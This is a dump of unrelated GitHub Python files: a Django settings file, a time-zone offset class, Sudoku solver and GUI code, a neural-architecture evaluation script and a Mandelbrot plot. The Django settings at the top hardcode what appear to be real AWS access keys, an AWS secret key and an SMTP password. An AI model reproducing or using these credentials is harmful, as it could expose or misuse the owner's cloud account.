'rest_framework_jwt.authentication.JSONWebTokenAuthentication',\n 'rest_framework.authentication.TokenAuthentication',\n # 'rest_framework.authentication.SessionAuthentication',\n ],\n 'DEFAULT_FILTER_BACKENDS': ('django_filters.rest_framework.DjangoFilterBackend',),\n 'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.LimitOffsetPagination',\n 
'PAGE_SIZE': 20\n}\n\nCORS_ORIGIN_WHITELIST = (\n    'localhost:8000',\n    '127.0.0.1:8000',\n    'klon-production.ap-northeast-1.elasticbeanstalk.com',\n    'd2lsr90acgtyop.cloudfront.net',\n    'klongroup.com',\n)\n\nREST_USE_JWT = True\nREST_SESSION_LOGIN = False\n\nJWT_AUTH = {\n    'JWT_ALLOW_REFRESH': True,\n    'JWT_EXPIRATION_DELTA': datetime.timedelta(days=7),\n}\n\nREST_AUTH_SERIALIZERS = {\n    'USER_DETAILS_SERIALIZER': 'api.serializers.UserSerializer'\n}\n\nDEFAULT_FROM_EMAIL = 'admin@klongroup.com'\nSERVER_EMAIL = 'admin@klongroup.com'\nEMAIL_BACKEND = 'django_smtp_ssl.SSLEmailBackend'\nEMAIL_HOST = 'email-smtp.us-west-2.amazonaws.com'\nEMAIL_PORT = 465\nEMAIL_USE_TLS = True\nEMAIL_HOST_USER = 'AKIAJQF3LEPENNUVGRHA'\nEMAIL_HOST_PASSWORD = 'Aqw55LzzfNfYznrzW382S2Lg3oVxEkMQ5sGCmhLq/hvZ'\n\nSTATICFILES_FINDERS = (\n    'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n    'django.contrib.staticfiles.finders.FileSystemFinder',\n)\n\nLANGUAGE_CODE = 'en-us'\nTIME_ZONE = 'Asia/Tokyo'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\nCSRF_COOKIE_SECURE = True\nCSRF_USE_SESSIONS = True\n\nAWS_S3_OBJECT_PARAMETERS = {\n    'Expires': 'Thu, 31 Dec 2099 20:00:00 GMT',\n    'CacheControl': 'max-age=94608000',\n}\n\nAWS_S3_HOST = \"s3-ap-northeast-1.amazonaws.com\"\nAWS_STORAGE_BUCKET_NAME = 'klons3'\nAWS_CLOUDFRONT_DOMAIN = 'd2ec47gai1sijw.cloudfront.net'\nAWS_S3_REGION_NAME = 'us-west-2'\nAWS_ACCESS_KEY_ID = 'AKIAISP2GY73LRP5AXFQ'\nAWS_SECRET_ACCESS_KEY = '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'\n\nAWS_S3_CUSTOM_DOMAIN = 'd2ec47gai1sijw.cloudfront.net'\nAWS_S3_FILE_OVERWRITE = False\n\nMEDIAFILES_LOCATION = 'media'\nMEDIA_ROOT = '/%s/' % MEDIAFILES_LOCATION\nMEDIA_URL = '//%s/%s/' % (AWS_CLOUDFRONT_DOMAIN, MEDIAFILES_LOCATION)\nDEFAULT_FILE_STORAGE = 'custom_storages.MediaStorage'\n\nSTATICFILES_LOCATION = 'static'\nSTATIC_ROOT = '/%s/' % STATICFILES_LOCATION\nSTATIC_URL = '//%s/%s/' % (AWS_CLOUDFRONT_DOMAIN, STATICFILES_LOCATION)\nSTATICFILES_STORAGE = 'custom_storages.StaticStorage'\n\n# AWS_DEFAULT_ACL = None\n\nLOGGING = {\n    'version': 1,\n    'disable_existing_loggers': False,\n    'filters': {\n        'require_debug_false': {\n            '()': 'django.utils.log.RequireDebugFalse'\n        }\n    },\n    'formatters': {\n        'verbose': {\n            'format': '[contactor] %(levelname)s %(asctime)s %(message)s'\n        },\n    },\n    'handlers': {\n        'console': {\n            'level': 'DEBUG',\n            'class': 'logging.StreamHandler',\n        },\n        'syslog': {\n            'level': 'INFO',\n            'class': 'logging.handlers.SysLogHandler',\n            'address': '/dev/log',\n            'formatter': 'verbose',\n        },\n    },\n    'loggers': {\n        '': {\n            'handlers': ['console', 'syslog', ],\n            'level': 'DEBUG',\n            'propagate': False,\n        },\n    }\n}","repo_name":"shunkakinoki/klon_website","sub_path":"klon/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":6284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74426223411","text":"__author__ = 'Tyler'\nimport numpy as np\nfrom utils.bp.temporal.temporal_queries import TemporalQueries\n\nclass ZoneOffset(object):\n    def __init__(self, total_seconds):\n        self.total_seconds = total_seconds\n        self.id = ZoneOffset.build_id(total_seconds)\n\n    SECONDS_CACHE = dict()\n    ID_CACHE = dict()\n    SECONDS_PER_HOUR = 60 * 60\n    SECONDS_PER_MINUTE = 60\n    MINUTES_PER_HOUR = 60\n    MAX_SECONDS = 18 * SECONDS_PER_HOUR\n\n    @classmethod\n    def of(cls, offset_id):\n        offset = cls.ID_CACHE.get(offset_id)\n        if offset is not None:\n            return offset\n        if len(offset_id) == 2:\n            offset_id = offset_id[0] + '0' + offset_id[1]
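\n        # (added note) the branches below accept ids of the forms +HH, +HHMM,\n        # +HH:MM, +HHMMSS and +HH:MM:SS (and the '-' variants); a single-digit\n        # '+H' was padded to '+0H' just above.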
\n        if len(offset_id) == 3:\n            hours = int(offset_id[1:3])\n            minutes = 0\n            seconds = 0\n        elif len(offset_id) == 5:\n            hours = int(offset_id[1:3])\n            minutes = int(offset_id[3:5])\n            seconds = 0\n        elif len(offset_id) == 6:\n            hours = int(offset_id[1:3])\n            minutes = int(offset_id[4:6])\n            seconds = 0\n        elif len(offset_id) == 7:\n            hours = int(offset_id[1:3])\n            minutes = int(offset_id[3:5])\n            seconds = int(offset_id[5:7])\n        elif len(offset_id) == 9:\n            hours = int(offset_id[1:3])\n            minutes = int(offset_id[4:6])\n            seconds = int(offset_id[7:9])\n        else:\n            raise Exception('Invalid ID')\n        first_ch = offset_id[0]\n        if first_ch != '+' and first_ch != '-':\n            raise Exception('Invalid ID')\n        if first_ch == '-':\n            return cls.of_hours_minutes_seconds(-hours, -minutes, -seconds)\n        else:\n            return cls.of_hours_minutes_seconds(hours, minutes, seconds)\n\n    @classmethod\n    def parse_number(cls, offset_id, pos, preceded_by_colon):\n        if preceded_by_colon and offset_id[pos-1] != ':':\n            raise Exception('Invalid Id')\n        ch1 = offset_id[pos]\n        ch2 = offset_id[pos + 1]\n        if ch1 < '0' or ch1 > '9' or ch2 < '0' or ch2 > '9':\n            raise Exception('Invalid Id')\n        return (ord(ch1) - 48) * 10 + (ord(ch2) - 48)\n\n    @classmethod\n    def of_hours(cls, hours):\n        return cls.of_hours_minutes_seconds(hours, 0, 0)\n\n    @classmethod\n    def of_hours_minutes(cls, hours, minutes):\n        return cls.of_hours_minutes_seconds(hours, minutes, 0)\n\n    @classmethod\n    def of_hours_minutes_seconds(cls, hours, minutes, seconds):\n        total_seconds = cls.total_seconds(hours, minutes, seconds)\n        return cls.of_total_seconds(total_seconds)\n\n    @classmethod\n    def from_temporal(cls, temporal):\n        offset = temporal.query(TemporalQueries.offset())\n        if offset is None:\n            raise Exception('Unable to obtain')\n        return offset\n\n    @classmethod\n    def total_seconds(cls, hours, minutes, seconds):\n        return hours*cls.SECONDS_PER_HOUR + \\\n            minutes*cls.SECONDS_PER_MINUTE + seconds\n\n    @classmethod\n    def of_total_seconds(cls, total_seconds):\n        if np.abs(total_seconds) > cls.MAX_SECONDS:\n            raise Exception('zone not in range')\n        if np.mod(total_seconds, 15*cls.SECONDS_PER_MINUTE) == 0:\n            total_secs = int(total_seconds)\n            result = cls.SECONDS_CACHE.get(total_secs)\n            if result is None:\n                result = ZoneOffset(total_seconds)\n                cls.SECONDS_CACHE[total_secs] = result\n            result = cls.SECONDS_CACHE.get(total_secs)\n            cls.ID_CACHE[result.get_id()] = result\n            return result\n        else:\n            return ZoneOffset(total_seconds)\n\n    @classmethod\n    def build_id(cls, total_seconds):\n        if total_seconds == 0:\n            return 'Z'\n        else:\n            abs_total_seconds = np.abs(total_seconds)\n            abs_hours = abs_total_seconds // cls.SECONDS_PER_HOUR\n            abs_minutes = np.mod(abs_total_seconds // cls.SECONDS_PER_MINUTE,\n                                 cls.MINUTES_PER_HOUR)\n            return_string = ''\n            if total_seconds < 0:\n                return_string += '-'\n            else:\n                return_string += '+'\n            if abs_hours < 10:\n                return_string += '0' + str(abs_hours)\n            else:\n                return_string += '' + str(abs_hours)\n            if abs_minutes < 10:\n                return_string += '0' + str(abs_minutes)\n            else:\n                return_string += '' + str(abs_minutes)\n            abs_seconds = np.mod(abs_total_seconds, cls.SECONDS_PER_MINUTE)\n            if abs_seconds != 0:\n                if abs_seconds < 10:\n                    return_string += '0' + str(abs_seconds)\n                else:\n                    return_string += '' + str(abs_seconds)\n            return return_string\n\n    def get_total_seconds(self):\n        return self.total_seconds\n\n    def get_id(self):\n        return self.id\n\n    def get_rules(self):\n        # return ZoneRules.of(self)\n        pass
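\n\n\n# Example (added for illustration):\n#     ZoneOffset.of('+09:30').get_total_seconds()   # -> 34200\n#     ZoneOffset.of_hours(-5).get_id()               # -> '-0500'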
\n","repo_name":"tylerrbowen/sample","sub_path":"utils/bp/zone_offset.py","file_name":"zone_offset.py","file_ext":"py","file_size_in_byte":5005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6484282973","text":"#!/usr/bin/env python\n# _*_coding:utf-8_*_\n\n\"\"\"\n    @Time : 2019-01-11 10:48 AM\n    @Author: qcymkxyc\n    @File: book1.py\n    @Software: PyCharm\n\n\n\"\"\"\n\n\ndef max_sub_nums(nums):\n    \"\"\"maximum-sum contiguous subarray\n\n    :param nums: List[int]\n        the input array\n    :return: List[int], int\n        the subarray and its sum\n    \"\"\"\n    # empty array\n    if len(nums) == 0:\n        return nums, 0\n\n    # if every element is negative\n    if len(list(filter(lambda x: x < 0, nums))) == len(nums):\n        return [], 0\n\n    max_sum = 0\n    pre_sum = 0\n    start, end = 0, len(nums) - 1\n    for i, num in enumerate(nums):\n        if pre_sum + num <= num:\n            start = i\n            pre_sum = num\n        else:\n            pre_sum += num\n\n        if pre_sum > max_sum:\n            max_sum = pre_sum\n            end = i\n\n    return nums[start: end + 1], max_sum\n","repo_name":"qcymkxyc/JZoffer","sub_path":"main/question42/book1.py","file_name":"book1.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71017705654","text":"# solve Sudoku by LMH\n# this program can solve Sudoku problems with only one solution\n# input should be 9 rows without any space in each row\n# the cells to be filled should be 0 in the input\n# e.g.:\n# 072100500\n# 030020409\n# 580047100\n# 026700950\n# 043065010\n# 057000643\n# 004971020\n# 210386090\n# 000000360\n\n# the output will be\n# [4, 7, 2, 1, 9, 3, 5, 8, 6]\n# [6, 3, 1, 5, 2, 8, 4, 7, 9]\n# [5, 8, 9, 6, 4, 7, 1, 3, 2]\n# [1, 2, 6, 7, 3, 4, 9, 5, 8]\n# [9, 4, 3, 8, 6, 5, 2, 1, 7]\n# [8, 5, 7, 2, 1, 9, 6, 4, 3]\n# [3, 6, 4, 9, 7, 1, 8, 2, 5]\n# [2, 1, 5, 3, 8, 6, 7, 9, 4]\n# [7, 9, 8, 4, 5, 2, 3, 6, 1]\n\n####################################################\n# function [data_room, flag_finish, potential_list] = uniquely_fill(data_room)\n# uniquely fill the table\n# if flag_finish==0, we need potential_list to continue the search\ndef uniquely_fill(data_room):\n    flag_changed = 1\n    flag_finish = 1\n    while flag_changed == 1:\n        flag_changed = 0 # set again below if anything changes in this pass\n        flag_finish = 1\n        # build the potential list\n        potential_list = list()\n        for i in range(0,9):\n            potential_list_onerow = list()\n            for j in range(0,9):\n                if (data_room[i][j] != 0): # there is a number in this space\n                    potential_list_onedata = list() # append an empty list\n                else:\n                    flag_finish = 0 # haven't finished yet\n                    # remove the numbers that are impossible for this cell\n                    potential_list_onedata = list([1,2,3,4,5,6,7,8,9])\n                    for num in range(1,10):\n                        for k in range(0,9):\n                            if (data_room[k][j] == num):\n                                try:\n                                    potential_list_onedata.remove(num)\n                                except ValueError:\n                                    pass\n                            if (data_room[i][k] == num):\n                                try:\n                                    potential_list_onedata.remove(num)\n                                except ValueError:\n                                    pass\n                        start_square_row = int(i/3)*3\n                        start_square_column = int(j/3)*3\n                        for k_row in range(start_square_row,start_square_row+3):\n                            for k_column in range(start_square_column,start_square_column+3):\n                                if (data_room[k_row][k_column] == num):\n                                    try:\n                                        potential_list_onedata.remove(num)\n                                    except ValueError:\n                                        pass\n                potential_list_onerow.append(potential_list_onedata)\n            potential_list.append(potential_list_onerow)\n\n        # only one number is potential in a space\n        for i in range(0,9):\n            for j in range(0,9):\n                if (len(potential_list[i][j]) == 1): \n                    data_room[i][j] = potential_list[i][j][0]\n                    flag_changed = 1\n\n        for num in range(1,10):\n            # in a row, one number can only appear in one space
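\n            # (added note) this is the classic 'hidden single' rule: if num fits\n            # in exactly one empty cell of the row, that cell must hold num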
\n            for i in range(0,9):\n                counts_appear_in_potential = 0\n                fill_index_j = -1\n                for j in range(0,9):\n                    if (potential_list[i][j].count(num) == 1):\n                        counts_appear_in_potential = counts_appear_in_potential + 1\n                        fill_index_j = j\n                if (counts_appear_in_potential == 1):\n                    data_room[i][fill_index_j] = num\n                    flag_changed = 1\n\n            # in a column, one number can only appear in one space\n            for j in range(0,9):\n                counts_appear_in_potential = 0\n                fill_index_i = -1\n                for i in range(0,9):\n                    if (potential_list[i][j].count(num) == 1):\n                        counts_appear_in_potential = counts_appear_in_potential + 1\n                        fill_index_i = i\n                if (counts_appear_in_potential == 1):\n                    data_room[fill_index_i][j] = num\n                    flag_changed = 1\n\n            # TODO: in a square, one number can only appear in one space\n\n    # output; if flag_finish==0, we need potential_list to continue the search\n    return data_room, flag_finish, potential_list\n\n####################################################\n# function [least_potential, x_of_least_potential, y_of_least_potential] = multi_solution_indicate(data_room,potential_list)\n# indicates how many candidates remain, and the cells that lead to multiple possible solutions\ndef multi_solution_indicate(data_room,potential_list):\n    least_potential = 10\n    x_of_least_potential = list()\n    y_of_least_potential = list()\n    for i in range(0,9):\n        for j in range(0,9):\n            if (data_room[i][j] == 0):\n                len_potent = len(potential_list[i][j])\n                if (len_potent < least_potential):\n                    least_potential = len_potent\n    for i in range(0,9):\n        for j in range(0,9):\n            if (data_room[i][j] == 0):\n                len_potent = len(potential_list[i][j])\n                if (len_potent == least_potential):\n                    least_potential = len_potent\n                    x_of_least_potential.append(i)\n                    y_of_least_potential.append(j)\n    return least_potential,x_of_least_potential,y_of_least_potential\n\n####################################################\n# function bool = is_potential_list_empty(potential_list)\n# check if a potential_list is empty\ndef is_potential_list_empty(potential_list):\n    max_len_potent = 0\n    for i in range(0,9):\n        for j in range(0,9):\n            len_potent = len(potential_list[i][j])\n            if (len_potent > max_len_potent):\n                max_len_potent = len_potent\n    if (max_len_potent == 0):\n        return True\n    else:\n        return False\n\n####################################################\n# function bool = check_sudoku(data_room)\n# performed after uniquely_fill() with is_finish==True\n# to check that the result is valid (every row and column must sum to 45)\ndef check_sudoku(data_room):\n    flag_valid = True\n    for i in range(0,9):\n        sum_data = 0\n        for j in range(0,9):\n            sum_data = sum_data + data_room[i][j]\n        if (sum_data != 45):\n            flag_valid = False\n    for j in range(0,9):\n        sum_data = 0\n        for i in range(0,9):\n            sum_data = sum_data + data_room[i][j]\n        if (sum_data != 45):\n            flag_valid = False\n    return flag_valid\n\n# read the data and create the main room for data\ninput_data = list()\nfor i in range(0,9):\n    str_read = input()\n    input_data.append(str_read)\n\nData_room = list() \nfor i in range(0,9):\n    one_row = list()\n    for j in range(0,9):\n        one_row.append(int(input_data[i][j]))\n    Data_room.append(one_row)\n\n[Data_room, is_finish, potential_table] = uniquely_fill(Data_room)\nif ((is_finish == 1) and (check_sudoku(Data_room))):\n    for i in range(0,9):\n        print(Data_room[i])\n    print()\nelse: # may have multiple solutions\n    [least_potential, x_list, y_list] = multi_solution_indicate(Data_room,potential_table)\n    for test in range(0,len(x_list)):\n        for n in potential_table[x_list[test]][y_list[test]]:\n            Data_room_try = list()\n            for i in range(0,9):
Data_room_try_oneRow = list()\n for j in range(0,9):\n Data_room_try_oneRow.append(Data_room[i][j])\n Data_room_try.append(Data_room_try_oneRow)\n Data_room_try[x_list[test]][y_list[test]] = n\n [Data_room_result, is_finish, potential_table_2nd] = uniquely_fill(Data_room_try)\n if ((is_finish == 1) and (check_sudoku(Data_room_result))):\n for print_index in range(0,9):\n print(Data_room_result[print_index])\n print()\n for i in range(0,9):\n for j in range(0,9):\n try:\n potential_table[i][j].remove(Data_room_result[i][j])\n except ValueError:\n pass\n","repo_name":"linmh0130/solve_sudoku","sub_path":"solve_sudoku.py","file_name":"solve_sudoku.py","file_ext":"py","file_size_in_byte":8252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41637601263","text":"import os\nimport sys\nimport glob\nimport numpy as np\nimport torch\nimport utils\nimport logging\nimport argparse\nimport torch.nn as nn\nimport genotypes\nimport torch.utils\nimport torchvision.datasets as dset\nimport torch.backends.cudnn as cudnn\nimport torchvision.transforms as transform\n\nfrom torch.autograd import Variable\nfrom model import NetworkCIFAR as Network\nimport dataset\nfrom sklearn.metrics import confusion_matrix\nimport matplotlib.pyplot as plt\nimport os\n\nparser = argparse.ArgumentParser(\"cifar\")\nparser.add_argument('--data', type=str, default='../data', help='location of the data corpus')\nparser.add_argument('--batch_size', type=int, default=50, help='batch size')\nparser.add_argument('--report_freq', type=float, default=50, help='report frequency')\nparser.add_argument('--gpu', type=int, default=0, help='gpu device id')\nparser.add_argument('--init_channels', type=int, default=36, help='num of init channels')\nparser.add_argument('--layers', type=int, default=9, help='total number of layers')\nparser.add_argument('--model_path', type=str, default='/home/lab540/PycharmProjects/darts_skeleton/eval-EXP-20200719-212149/weights.pt', help='path of pretrained model')\nparser.add_argument('--auxiliary', action='store_true', default=False, help='use auxiliary tower')\nparser.add_argument('--cutout', action='store_true', default=True, help='use cutout')\nparser.add_argument('--cutout_length', type=int, default=16, help='cutout length')\nparser.add_argument('--drop_path_prob', type=float, default=0.2, help='drop path probability')\nparser.add_argument('--seed', type=int, default=0, help='random seed')\nparser.add_argument('--arch', type=str, default='kinetics_112se41', help='which architecture to use')\nargs = parser.parse_args()\n\nlog_format = '%(asctime)s %(message)s'\nlogging.basicConfig(stream=sys.stdout, level=logging.INFO,\n format=log_format, datefmt='%m/%d %I:%M:%S %p')\n\nntu_CLASSES = 400\n\n\ndef main():\n if not torch.cuda.is_available():\n logging.info('no gpu device available')\n sys.exit(1)\n\n np.random.seed(args.seed)\n torch.cuda.set_device(args.gpu)\n cudnn.benchmark = True\n torch.manual_seed(args.seed)\n cudnn.enabled=True\n torch.cuda.manual_seed(args.seed)\n logging.info('gpu device = %d' % args.gpu)\n logging.info(\"args = %s\", args)\n\n genotype = eval(\"genotypes.%s\" % args.arch)\n model = Network(args.init_channels, ntu_CLASSES, args.layers, args.auxiliary, genotype)\n model = model.cuda()\n utils.load(model, args.model_path)\n\n logging.info(\"param size = %fMB\", utils.count_parameters_in_MB(model))\n\n criterion = nn.CrossEntropyLoss()\n criterion = criterion.cuda()\n\n validset = 
dataset.MyDataset('/media/lab540/79eff75a-f78c-42f2-8902-9358e88bf654/lab540/Neura_auto_search/datasets/kinetics_convert/test.txt',\n                            transform = transform.ToTensor())\n    valid_queue = torch.utils.data.DataLoader(validset, batch_size=args.batch_size, shuffle=False, num_workers=1)\n\n    # _, test_transform = utils._data_transforms_cifar10(args)\n    # test_data = dset.CIFAR10(root=args.data, train=False, download=True, transform=test_transform)\n    #\n    # test_queue = torch.utils.data.DataLoader(\n    #     test_data, batch_size=args.batch_size, shuffle=False, pin_memory=True, num_workers=2)\n\n    model.drop_path_prob = args.drop_path_prob\n    test_acc, test_obj = infer(valid_queue, model, criterion)\n    logging.info('test_acc %f', test_acc)\n\n\ndef infer(valid_queue, model, criterion):\n    objs = utils.AvgrageMeter()\n    top1 = utils.AvgrageMeter()\n    top5 = utils.AvgrageMeter()\n    model.eval()\n\n\n    # true_labels = []\n    predicted_labels = []\n    with torch.no_grad():\n        for step, (input, target) in enumerate(valid_queue):\n            input = input.cuda()  # Variable(..., volatile=True) is deprecated; torch.no_grad() already disables autograd\n            target = target.cuda()\n\n            logits, _ = model(input)\n            _, predicted = torch.max(logits.data, 1)\n            for i in range(predicted.shape[0]):\n                predicted_labels.append(predicted[i].item())  # store plain ints so np.asarray works on GPU tensors\n            loss = criterion(logits, target)\n\n            prec1, prec5 = utils.accuracy(logits, target, topk=(1, 5))\n            n = input.size(0)\n            objs.update(loss.item(), n)\n            top1.update(prec1.item(), n)\n            top5.update(prec5.item(), n)\n\n            if step % args.report_freq == 0:\n                logging.info('test %03d %e %f %f', step, objs.avg, top1.avg, top5.avg)\n    predicted_labels = np.asarray(predicted_labels)\n    np.save('/home/lab540/PycharmProjects/darts_skeleton/predicted_labels3.npy', predicted_labels)\n    return top1.avg, objs.avg  # (accuracy, loss) so main() unpacks test_acc, test_obj correctly\n\n\nif __name__ == '__main__':\n    main() \n\n","repo_name":"zhy0860/phi","sub_path":"SAR-NAS/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4518,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"40083494026","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n\"\"\"\nI don't fully understand this one yet, it's pretty though. 
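The escape-time idea: iterate z -> z**2 + c starting from z = 0; a point c belongs to the Mandelbrot set when that orbit stays bounded, and checking |z| <= 2 after a fixed number of iterations is the usual bounded-orbit test.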
\n\ncomplex_matrix returns an array of real and imaginary numbers for is_stable to work on\nis_stable contains the definition of the Mandelbrot function\n\"\"\"\n\n\n# Linearly spaced real and imaginary numbers between xmin, xmax and ymin, ymax, pixel density amount.\ndef complex_matrix(xmin, xmax, ymin, ymax, pixel_density):\n    real = np.linspace(xmin, xmax, int((xmax - xmin) * pixel_density))\n    imaginary = np.linspace(ymin, ymax, int((ymax - ymin) * pixel_density))\n    return real[np.newaxis, :] + imaginary[:, np.newaxis] * 1j\n\n\ndef is_stable(c, num_iterations):\n    z = 0\n    for _ in range(num_iterations):\n        z = z ** 2 + c\n    return abs(z) <= 2\n\n\nif __name__ == '__main__':\n    c = complex_matrix(-2, 0.5, -1.5, 1.5, pixel_density=512)\n    plt.imshow(is_stable(c, num_iterations=20), cmap=\"binary\")\n    plt.gca().set_aspect(\"equal\")\n    plt.axis(\"off\")\n    plt.tight_layout()\n    plt.show()\n","repo_name":"BillyUdders/algorithms","sub_path":"src/mandelbrot_set.py","file_name":"mandelbrot_set.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23604833785","text":"#there's about a 1/25 chance for the program to freeze after you hit solve\n#most of the time the puzzle will solve almost instantly but could take a couple seconds\nfrom tkinter import *\nfrom sudokuSolver import solve\nfrom sudokuMaker import makePuzzel\nfrom sudokuChecker import checkBoard\n#global vars\nsectionsNums = []\nfor i in range(9):\n    sectionsNums.append([])\n    for n in range(3):\n        sectionsNums[i].append([\" \",\" \",\" \"])\nsectionsBtns = []\ncurrentCoord=\"000\"\nnumberOfFilledSquares = 17\n#create root\nroot = Tk()\nroot.title(\"sudoku\")\nroot.config(background=\"purple\")\n\n#string vars\nsection = StringVar()\nrow = StringVar()\ncol = StringVar()\nout = StringVar()\n\n#functions\n\n#when you click on a sudoku square it sets the new coords\ndef setNewCord(cord):\n    global currentCoord\n    currentCoord=cord\n    section.set(f\"Section: {int(currentCoord[0])+1}\")\n    row.set(f\"Row: {round(int(currentCoord[1])+(int(currentCoord[0])-int(currentCoord[0])%3))+1}\")\n    col.set(f\"Column: {int(currentCoord[2])+(int(currentCoord[0])%3)*3+1}\")\n    out.set(\"\")\n\n#sets number in current square when you click on a num button \ndef setNum(num):\n    global currentCoord\n    global sectionsBtns\n    global sectionsNums\n    global out\n    spot = sectionsBtns[int(currentCoord[0])][int(currentCoord[1])][int(currentCoord[2])]\n    if spot.changable:\n        spot.config(text=num)\n        sectionsNums[int(currentCoord[0])][int(currentCoord[1])][int(currentCoord[2])] = num\n        out.set(\"\")\n    else:\n        out.set(\"sorry you can't change that square\")\n    \n#sets all the sudoku buttons to the corresponding values in the section list\ndef setAllNums():\n    global sectionsNums\n    global sectionsBtns\n    for section in range(len(sectionsBtns)):\n        for row in range(len(sectionsBtns[section])):\n            for spot in range(len(sectionsBtns[section][row])):\n                sectionsBtns[section][row][spot].config(text = sectionsNums[section][row][spot])\n                if sectionsNums[section][row][spot].isdigit():\n                    sectionsBtns[section][row][spot].config(bg = \"Dark Grey\")\n                    sectionsBtns[section][row][spot].changable = False\n                else:\n                    sectionsBtns[section][row][spot].config(bg = \"Grey\")\n                    sectionsBtns[section][row][spot].changable = True\n\n#runs the puzzle through the solving alg\ndef solvePuzzle():\n    global sectionsNums\n    global out\n    if checkBoard(convertBoardToSolve()):\n        #copies the board to save the current data\n        copyOboard = []\n        for i 
in range(9):\n            copyOboard.append([[' ',' ',' '],[' ',' ',' '],[' ',' ',' ']])\n        for s in range(len(sectionsNums)):\n            for r in range(len(sectionsNums[s])):\n                for c in range(len(sectionsNums[s][r])):\n                    copyOboard[s][r][c] = sectionsNums[s][r][c]\n        \n        readListORows(solve(convertBoardToSolve()))    \n        setAllNums()\n        #if nothing changed then there was no solution found\n        if sectionsNums == copyOboard:\n            out.set(\"sorry, no solution was found\")\n        else:\n            out.set(\"Puzzle is solved :)\")\n    else:\n        out.set(\"Puzzle is invalid :(\")\n        \n#used to help change between the different board formats\ndef secColCheck(c):\n    if c in range(0,3):\n        return 0\n    elif c in range(3,6):\n        return 1\n    else:\n        return 2\n\n#converts sectionNums to a readable format for the solver (a list of rows rather than a list of sections)\ndef convertBoardToSolve():\n    global sectionsNums\n    listORows=[]\n    for _ in range(9):\n        listORows.append([])\n    for s in range(len(sectionsNums)):\n        for r in range(len(sectionsNums[s])):\n            for c in sectionsNums[s][r]:\n                listORows[((s-s%3))+r].append(c)\n    return listORows\n    \n#reformats the list of rows back to a list of sections\ndef readListORows(board):\n    global sectionsNums\n    for r in range(len(board)):\n        for c in range(len(board[r])):\n            if r in range(0,3):\n                s=secColCheck(c)\n            elif r in range(3,6):\n                s=secColCheck(c)+3\n            else:\n                s=secColCheck(c)+6\n            sectionsNums[s][r%3][c%3] = board[r][c]\n\n#generates a new puzzle\ndef newPuzzle():\n    global out\n    global numberOfFilledSquares\n    readListORows(makePuzzel(numberOfFilledSquares))\n    setAllNums()\n    out.set(\"have fun :)\")\n    \n#makes the board blank\ndef clearBoard():\n    global sectionsNums\n    sectionsNums = []\n    for i in range(9):\n        sectionsNums.append([])\n        for n in range(3):\n            sectionsNums[i].append([\" \",\" \",\" \"])\n    out.set(\"look at that clean board :)\")\n    setAllNums()\n\n#checks the current board\ndef check():\n    global sectionsNums\n    global out\n    notSolved = False\n    done = False\n    if checkBoard(convertBoardToSolve()):\n        while not(notSolved or done):\n            for sec in sectionsNums:\n                for row in sec:\n                    for char in row:\n                        if char == \" \":\n                            notSolved = True\n            done = True\n        if notSolved:\n            out.set(\"Looks good so far\")\n        else:\n            out.set(\"Great work!\")\n    else:\n        out.set(\"you messed up somewhere\")\n#boring stuff\n\n#sudoku button board\nsudokuFrame = Frame(root,height=30,width=60,bg=\"purple\")\nsudokuFrame.pack()\nfor i in range(9):\n    sectionFrame = Frame(sudokuFrame,bd=3,height=10,width=20,bg=\"purple\")\n    if i<3:\n        sectionFrame.grid(row=0, column=i%3)\n    elif i<6:\n        sectionFrame.grid(row=1, column=i%3)\n    else:\n        sectionFrame.grid(row=2, column=i%3)\n    sectionsBtns.append([[],[],[]])\n    for n in range(9):\n        sudokuBTN = Button(sectionFrame,bd=5,width=6,height=3)\n        if n<3:\n            sudokuBTN.grid(row=0, column=n%3,padx=2,pady=2)\n            sudokuBTN.cord = f\"{i}0{n%3}\"\n            sudokuBTN.changable = True\n            sudokuBTN.config(command= lambda cord = sudokuBTN.cord: setNewCord(cord))\n            sectionsBtns[i][0].append(sudokuBTN)\n        elif n<6:\n            sudokuBTN.grid(row=1, column=n%3,padx=2,pady=2)\n            sudokuBTN.cord = f\"{i}1{n%3}\"\n            sudokuBTN.changable = True\n            sudokuBTN.config(command= lambda cord = sudokuBTN.cord: setNewCord(cord))\n            sectionsBtns[i][1].append(sudokuBTN)\n        else:\n            sudokuBTN.grid(row=2, column=n%3,padx=2,pady=2)\n            sudokuBTN.cord = f\"{i}2{n%3}\"\n            sudokuBTN.changable = True\n            sudokuBTN.config(command= lambda cord = sudokuBTN.cord: setNewCord(cord))\n            sectionsBtns[i][2].append(sudokuBTN)\n\n#coord system labels\ncoordFrame = 
